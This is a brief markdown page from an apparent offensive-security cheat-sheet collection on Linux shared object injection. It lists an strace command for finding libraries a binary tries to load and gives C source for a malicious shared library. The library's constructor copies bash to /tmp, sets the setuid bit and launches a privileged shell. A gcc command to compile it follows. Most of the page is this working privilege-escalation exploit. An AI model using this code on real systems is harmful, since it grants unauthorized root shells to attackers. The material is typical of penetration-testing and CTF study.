killchain-compendium/exploit/linux/shared_object_injection.md

531 B

Shared Object Injection

strace <binary> 2>&1 | grep -i -E "open|access|no such file"

Example

#include <stdio.h>
#include <stdlib.h>

static void inject ( ) __attribute__ ( (constructor) );

void inject ( ) {
    system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
}
  • gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c
  • Run binary using the lib